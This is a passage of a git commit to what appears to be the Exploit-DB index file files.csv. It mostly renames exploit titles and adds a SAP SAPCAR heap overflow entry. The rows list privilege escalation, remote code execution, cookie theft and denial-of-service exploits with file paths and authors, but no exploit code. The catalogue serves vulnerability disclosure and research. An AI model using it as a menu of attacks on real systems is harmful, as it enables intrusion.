DB: 2017-05-11
5 new exploits PocketPC Mms Composer - (WAPPush) Denial of Service PocketPC Mms Composer - 'WAPPush' Denial of Service BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs) BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoC) DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs) DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC) otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs) otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service) (PoC) Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.0 / 2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.12 / 2.2.14 / 2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.4.18 / 2.4.19 - Privileged File Descriptor Resource Exhaustion Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035) Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035) SAP SAPCAR 721.510 - Heap-Based Buffer Overflow Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1) Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) HT Editor 2.0.20 - Buffer Overflow (ROP PoC) HT Editor 2.0.20 - Buffer Overflow (ROP) (PoC) Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x / 2.5.x / 2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Privilege Escalation Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2) Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2) Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1) Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow (Metasploit) Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit) Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Linux Kernel 2.0.30 / 2.0.35 / 2.0.36 / 2.0.37 - Blind TCP Spoofing Netscape Enterprise Server_ Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Netscape Enterprise Server / Novell Groupwise 5.2/5.5 GWWEB.EXE - Multiple Vulnerabilities Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.0.x / 2.2.x / 2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2) Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3) Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084) Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084) Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities Microsoft Internet Explorer 8 / 9 - Steal Any Cookie Microsoft Internet Explorer 8/9 - Steal Any Cookie PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421 / 1.2 1.2.0.846 - Multiple Vulnerabilities C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S_ DVR - Credentials Disclosure / Authentication Bypass C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S / DVR - Credentials Disclosure / Authentication Bypass AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass BanManager WebUI 1.5.8 - PHP Code Injection Gongwalker API Manager 1.1 - Cross-Site Request Forgery
This commit is contained in:
parent
4e3947178d
commit
5aee851cfb
7 changed files with 439 additions and 37 deletions
55
files.csv
55
files.csv
|
@ -372,7 +372,7 @@ id,file,description,date,author,platform,type,port
|
||||||
2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0
|
2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0
|
||||||
2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0
|
2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0
|
||||||
2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0
|
2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0
|
||||||
2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - (WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0
|
2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0
|
||||||
2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0
|
2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow (PoC)",2006-08-10,"Luigi Auriemma",windows,dos,0
|
||||||
2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0
|
2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0
|
||||||
2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
|
2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
|
||||||
|
@ -637,7 +637,7 @@ id,file,description,date,author,platform,type,port
|
||||||
4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
|
4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
|
||||||
4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0
|
4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0
|
||||||
4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0
|
4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos,0
|
||||||
4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs)",2007-09-08,ZhenHan.Liu,windows,dos,0
|
4375,platforms/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoC)",2007-09-08,ZhenHan.Liu,windows,dos,0
|
||||||
4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0
|
4379,platforms/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0
|
||||||
4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0
|
4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0
|
||||||
4409,platforms/windows/dos/4409.html,"HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0
|
4409,platforms/windows/dos/4409.html,"HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos,0
|
||||||
|
@ -1053,7 +1053,7 @@ id,file,description,date,author,platform,type,port
|
||||||
8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
|
8650,platforms/windows/dos/8650.c,"TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service",2009-05-11,"Jonathan Salwan",windows,dos,0
|
||||||
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
|
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
|
||||||
8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0
|
8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service (PoC)",2009-05-13,mu-b,multiple,dos,0
|
||||||
8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs)",2009-05-14,SirGod,windows,dos,0
|
8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)",2009-05-14,SirGod,windows,dos,0
|
||||||
8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0
|
8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0
|
||||||
8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0
|
8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0
|
||||||
8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0
|
8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0
|
||||||
|
@ -1092,7 +1092,7 @@ id,file,description,date,author,platform,type,port
|
||||||
9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0
|
9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0
|
||||||
9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0
|
9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0
|
||||||
9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0
|
9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0
|
||||||
9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs)",2009-07-10,Stack,windows,dos,0
|
9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoC)",2009-07-10,Stack,windows,dos,0
|
||||||
9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0
|
9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0
|
||||||
9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0
|
9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0
|
||||||
9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0
|
9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0
|
||||||
|
@ -2032,7 +2032,7 @@ id,file,description,date,author,platform,type,port
|
||||||
17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
|
17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
|
||||||
17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0
|
17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0
|
||||||
17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
|
17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
|
||||||
17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC)",2011-09-18,loneferret,windows,dos,21
|
17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service) (PoC)",2011-09-18,loneferret,windows,dos,21
|
||||||
17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
|
17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
|
||||||
17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
|
17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
|
||||||
17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0
|
17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0
|
||||||
|
@ -2659,7 +2659,7 @@ id,file,description,date,author,platform,type,port
|
||||||
21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 - Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0
|
21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 - Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0
|
||||||
21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0
|
21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0
|
||||||
21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0
|
21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0
|
||||||
21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0
|
21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18 / 2.4.19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0
|
||||||
21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
|
21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
|
||||||
21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0
|
21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0
|
||||||
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0
|
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0
|
||||||
|
@ -4276,7 +4276,7 @@ id,file,description,date,author,platform,type,port
|
||||||
33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
|
33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
|
||||||
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos,0
|
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service",2014-06-13,"A reliable source",windows,dos,0
|
||||||
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
|
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0
|
||||||
33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
|
33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0
|
||||||
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
|
||||||
33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
|
33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0
|
||||||
33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0
|
33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0
|
||||||
|
@ -5489,6 +5489,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41982,platforms/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",android,dos,0
|
41982,platforms/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",android,dos,0
|
||||||
41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
|
41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
|
||||||
41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
|
41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
|
||||||
|
41991,platforms/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -7046,7 +7047,7 @@ id,file,description,date,author,platform,type,port
|
||||||
18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
|
18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
|
||||||
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
|
18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
|
||||||
18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
|
18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0
|
||||||
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
|
18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0
|
||||||
18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
|
18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
|
||||||
18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
|
18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0
|
||||||
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
|
18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0
|
||||||
|
@ -7557,8 +7558,8 @@ id,file,description,date,author,platform,type,port
|
||||||
20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched - Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0
|
20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched - Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0
|
||||||
20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,solaris,local,0
|
20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 - Logging Output File",2001-03-23,KimYongJun,solaris,local,0
|
||||||
20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
|
20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 - Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
|
||||||
